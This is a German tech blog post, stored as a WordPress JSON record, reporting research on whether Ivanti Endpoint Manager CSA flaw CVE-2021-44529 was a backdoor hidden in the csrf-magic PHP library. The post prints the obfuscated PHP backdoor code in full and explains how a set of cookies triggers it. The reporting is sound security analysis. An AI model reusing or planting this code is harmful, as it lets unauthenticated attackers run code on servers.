{"id":292536,"date":"2024-02-21T10:22:22","date_gmt":"2024-02-21T09:22:22","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=292536"},"modified":"2024-02-22T01:35:43","modified_gmt":"2024-02-22T00:35:43","slug":"ivanti-endpoint-manager-schwachstelle-cve-2021-44529-code-injection-oder-backdoor","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2024\/02\/21\/ivanti-endpoint-manager-schwachstelle-cve-2021-44529-code-injection-oder-backdoor\/","title":{"rendered":"Ivanti Endpoint Manager Schwachstelle CVE-2021-44529: Code-Injection oder Backdoor?"},"content":{"rendered":"<p><img decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline;\" title=\"Sicherheit (Pexels, allgemeine Nutzung)\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2021\/04\/Sicherheit_klein.jpg\" alt=\"Sicherheit (Pexels, allgemeine Nutzung)\" width=\"200\" align=\"left\" \/>[<a href=\"https:\/\/borncity.com\/win\/2024\/02\/22\/ivanti-endpoint-manager-vulnerability-cve-2021-44529-code-injection-or-backdoor\/\" target=\"_blank\" rel=\"noopener\">English<\/a>]Neuer Schwank rund um den Ivanti Endpoint Manager. Im Jahr 2021 wurde von Ivanti im Produkt eine als \"Code Injection\" bezeichnete Sicherheitsl\u00fccke CVE-2021-44529 geschlossen. Es gab Ger\u00fcchte, dass es sich um einen Backdoor (Hintert\u00fcr) in einem Open-Source-Projekt handelte. Ein Sicherheitsforscher hat sich darauf hin den Code nochmals genauer angesehen und erstaunliche Erkenntnisse gewonnen.<\/p>\n<p><!--more--><\/p>\n<h2>CVE-2021-44529 in Ivanti Endpoint Manager<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg06.met.vgwort.de\/na\/9ad6f34ab9174a0ab634356dcbff60d6\" alt=\"\" width=\"1\" height=\"1\" \/>Ich hatte es hier im Blog nicht thematisiert, da Ivanti 2021 bei mir noch nicht auf dem Radar war (kam erst mit dem Hack von Norwegens Regierungen, siehe <a href=\"https:\/\/borncity.com\/blog\/2023\/07\/25\/norwegens-regierung-ber-ivanti-zero-day-gehackt\/\">Norwegens Regierung \u00fcber Ivanti-Zero-Day gehackt<\/a> und die Links am Artikelende). Am 8. Dezember 2021 gab es eine Warnung zur Schwachstelle <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44529\" target=\"_blank\" rel=\"noopener\">CVE-2021-44529<\/a>.\u00a0 Es war eine Code-Injection-Schwachstelle in der Ivanti EPM Cloud Services Appliance (CSA) bekannt geworden. Diese erlaubt es, einem nicht-authentifizierten Benutzer, beliebigen Code mit eingeschr\u00e4nkten Rechten (nobody) auszuf\u00fchren.<\/p>\n<p>Das betraf den Ivanti Endpoint Manager CSA Version 4.5 und 4.6. Ivanti hatte am 2. Dezember 2021 <a href=\"https:\/\/forums.ivanti.com\/s\/article\/SA-2021-12-02?language=en_US\" target=\"_blank\" rel=\"noopener\">dieses Security Advisory<\/a> herausgegeben. Dort finden sich auch Hinweise auf Updates und Gegenma\u00dfnahmen. Von PacketStorm-Security gab es dann zum 18. Januar 2023 noch <a href=\"https:\/\/packetstormsecurity.com\/files\/170590\/Ivanti-Cloud-Services-Appliance-CSA-Command-Injection.html\" target=\"_blank\" rel=\"noopener\">einen Folgebeitrag<\/a> zur Schwachstelle, der einen <a href=\"https:\/\/de.wikipedia.org\/wiki\/Metasploit\" target=\"_blank\" rel=\"noopener\">Metasploit<\/a> f\u00fcr die Schwachstelle enthielt.<\/p>\n<h2>Backdoor oder Code-Injection-Schwachstelle?<\/h2>\n<p>Gerade bin ich \u00fcber nachfolgenden <a href=\"https:\/\/twitter.com\/arekfurt\/status\/1760056532387995934\" target=\"_blank\" rel=\"noopener\">Tweet<\/a> auf eine neue Information gesto\u00dfen. Ron Bowes von Greynoise Labs hat sich die Schwachstelle und den Quellcode nochmals angeschaut. Dies war m\u00f6glich, weil Ivanti Open Source Software in seinem Produkt verwendet hat. Hintergrund war, dass Sicherheitsexperte <a href=\"https:\/\/twitter.com\/haxor31337\">Tuan Anh Nguyen <\/a>im M\u00e4rz 2022 <a href=\"https:\/\/twitter.com\/haxor31337\/status\/1507182030727135236\" target=\"_blank\" rel=\"noopener\">schrieb<\/a>, dass er sich sicher sei, dass die Schwachstelle als Backdoor in die Software gekommen ist. Nachfolgender Tweet legt den Punkt bereits offen:<\/p>\n<p><a href=\"https:\/\/twitter.com\/arekfurt\/status\/1760056532387995934\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/i.postimg.cc\/k42bBMpp\/image.png\" \/><\/a><\/p>\n<p>Ron Bowes ist diesem Verdacht nachgegangen, hat recherchiert und hat sich \u00fcber die Way Back Machine den Code des betreffenden Pakets genauer angegeben. Es handelt sich, wenn ich es richtig verstanden habe, um <a href=\"https:\/\/github.com\/ezyang\/csrf-magic\" target=\"_blank\" rel=\"noopener\">csrf-magic<\/a>, ein Paket, welches einen <a href=\"https:\/\/de.wikipedia.org\/wiki\/Cross-Site-Request-Forgery\" target=\"_blank\" rel=\"noopener\">Cross-Site-Request-Forgery-Angriff<\/a> in PHP verhindern soll. \u00dcber die Way Back Machine ist er auf ein Archiv vom M\u00e4rz 2022 gesto\u00dfen, aber der letzte Commit war vom Februar 2014.<\/p>\n<p>Dann begann der Sicherheitsforscher den Quellcode nach einer Backdoor zu durchsuchen. Seine Vermutung war, dass die Backdoor sorgf\u00e4ltig im Code versteckt sein wurde. Aber er wurde am Ende der Datei im Quellcode f\u00fcndig.<\/p>\n<pre>\/\/ Obscure Tokens\r\n$aeym=\"RlKHfsByZWdfcmVwfsbGFjZShhcnJheSgnLfs1teXHc9fsXHNdLyfscsJy9fsccy8nfsKSwgYXJyfsYXkoJycsfsJysn\";\r\n$lviw = str_replace(\"m\",\"\",\"msmtmr_mrmemplmamcme\");\r\n$bbhj=\"JGMofsJGEpPjMpefsyRrPSdjMTIzJzfstlfsY2hvICc8Jy4kay4nPic7ZXfsZfshbChiYXNlNjRfZGVjb2\";\r\n$hpbk=\"fsJGfsM9fsJ2NvdW50fsJzfsskYfsT0kXfs0NPT0tJRTtpZihyfsZfsXNldfsCgfskYfsSkfs9fsPSdhYicgJiYg\";\r\n$rvom=\"KSwgam9pbihhcnfsJheV9zbGljZSgkYSwkYyfsgkYSktMyfskpfsKSkpOfs2VjaG8gJzwvJy4fskay4nPic7fQ==\";\r\n$xytu = $lviw(\"oc\", \"\", \"ocbocaocseoc6oc4_ocdoceoccocoocdoce\");\r\n$murp = $lviw(\"k\",\"\",\"kckrkeaktkek_kfkunkcktkikokn\");\r\n$zmto = $murp('', $xytu($lviw(\"fs\", \"\", $hpbk.$bbhj.$aeym.$rvom))); $zmto();<\/pre>\n<p>Er begann den obigen Code zu analysieren und kam zum Schluss, dass dort die Backdoor sei. Diese ben\u00f6tigt mindestens 4 Cookies f\u00fcr den Code Injection-Angriff. Das erste Cookie muss den Wert \"ab\" haben, und die letzten drei Cookies werden verkettet, als leicht verschl\u00fcsselte base64 dekodiert und ausgef\u00fchrt. Ron Bowes hat seine Erkenntnisse im Beitrag <a href=\"https:\/\/www.labs.greynoise.io\/grimoire\/2024-02-what-is-this-old-ivanti-exploit\/\" target=\"_blank\" rel=\"noopener\">Code injection or backdoor: A new look at Ivanti's CVE-2021-44529<\/a> ver\u00f6ffentlicht.<\/p>\n<p>Im schlechtesten Fall steckte die Schwachstelle CVE-2021-44529, letztendlich wohl eine Backdoor, bereits seit sieben Jahren im Open Source Modul. Und es scheint recht einfach zu sein, einen Exploit f\u00fcr diese Schwachstelle zu schreiben. Wie dieser Code in das Projekt gekommen ist und warum das nicht auffiel, blieb im Dunkeln. Aber der Fall zeigt, dass Ivanti die Sicherheit mit seinen Produkten nicht im Griff hat &#8211; ich hatte ja im Beitrag <a href=\"https:\/\/borncity.com\/blog\/2024\/02\/06\/kleine-warnung-finger-weg-von-ivanti-vpn\/\">Kleine Warnung: Finger weg von Ivanti VPN; die benutzen wohl Uralt-Tools mit<\/a> bereits einen anderen Fall aufgegriffen &#8211; was sp\u00e4ter auch anderen Sicherheitsforschern auffiel (siehe <a href=\"https:\/\/borncity.com\/blog\/2024\/02\/16\/ivantis-uralter-software-klump-fllt-auch-sicherheitsforschern-auf\/\">Ivantis uralter Software-Klump \u2013 f\u00e4llt auch Sicherheitsforschern auf<\/a>).<\/p>\n<p><strong>\u00c4hnliche Artikel:<br \/>\n<\/strong><a href=\"https:\/\/borncity.com\/blog\/2023\/07\/25\/norwegens-regierung-ber-ivanti-zero-day-gehackt\/\">Norwegens Regierung \u00fcber Ivanti-Zero-Day gehackt<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2023\/07\/31\/ivanti-besttigt-2-schwachstelle-cve-2023-35081-bei-hack-der-norwegischen-regierung\/\">Ivanti best\u00e4tigt 2. Schwachstelle CVE-2023-35081 bei Hack der norwegischen Regierung<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2023\/08\/03\/diensttelefone-des-digitalministeriums-ber-ivanti-schwachstellen-angreifbar\/\">Diensttelefone des Digitalministeriums \u00fcber Ivanti-Schwachstellen angreifbar<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2023\/08\/03\/schwachstelle-cve-2023-35082-in-ivanti-mobileiron-core-bis-version-11-2\/\">Schwachstelle CVE-2023-35082 in Ivanti MobileIron Core (bis Version 11.2)<\/a><strong><br \/>\n<\/strong><a href=\"https:\/\/borncity.com\/blog\/2024\/01\/13\/warnung-vor-schwachstellen-fortinet-ivanti-und-mehr-januar-2024\/\">Warnung vor Schwachstellen; Fortinet, Ivanti und mehr (Januar 2024)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/01\/22\/tausende-gerte-per-ivanti-vpn-schwachstellen-angegriffen-mind-19-in-deutschland\/\">Tausende Ger\u00e4te per Ivanti VPN-Schwachstellen angegriffen \u2013 mind. 19 in Deutschland<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/01\/23\/massive-angriffswelle-auf-ivanti-vpn-appliances-warnung-konfigurations-pushes-kann-hrtungsmanahmen-gefhrden\/\">Massive Angriffswelle auf Ivanti VPN-Appliances; Warnung, Konfigurations-Pushes kann H\u00e4rtungsma\u00dfnahmen gef\u00e4hrden<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/02\/01\/ivanti-connect-secure-neue-schwachstellen-cve-2024-21888-und-cve-2024-21893\/\">Ivanti Connect Secure: Neue Schwachstellen CVE-2024-21888 und CVE-2024-21893 gepatcht<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/02\/06\/kleine-warnung-finger-weg-von-ivanti-vpn\/\">Kleine Warnung: Finger weg von Ivanti VPN; die benutzen wohl Uralt-Tools mit<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2024\/02\/16\/ivantis-uralter-software-klump-fllt-auch-sicherheitsforschern-auf\/\">Ivantis uralter Software-Klump \u2013 f\u00e4llt auch Sicherheitsforschern auf<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[English]Neuer Schwank rund um den Ivanti Endpoint Manager. Im Jahr 2021 wurde von Ivanti im Produkt eine als \"Code Injection\" bezeichnete Sicherheitsl\u00fccke CVE-2021-44529 geschlossen. Es gab Ger\u00fcchte, dass es sich um einen Backdoor (Hintert\u00fcr) in einem Open-Source-Projekt handelte. Ein Sicherheitsforscher &hellip; <a href=\"https:\/\/borncity.com\/blog\/2024\/02\/21\/ivanti-endpoint-manager-schwachstelle-cve-2021-44529-code-injection-oder-backdoor\/\">Weiterlesen <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426],"tags":[4328],"class_list":["post-292536","post","type-post","status-publish","format-standard","hentry","category-sicherheit","tag-sicherheit"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/292536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=292536"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/292536\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=292536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=292536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=292536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}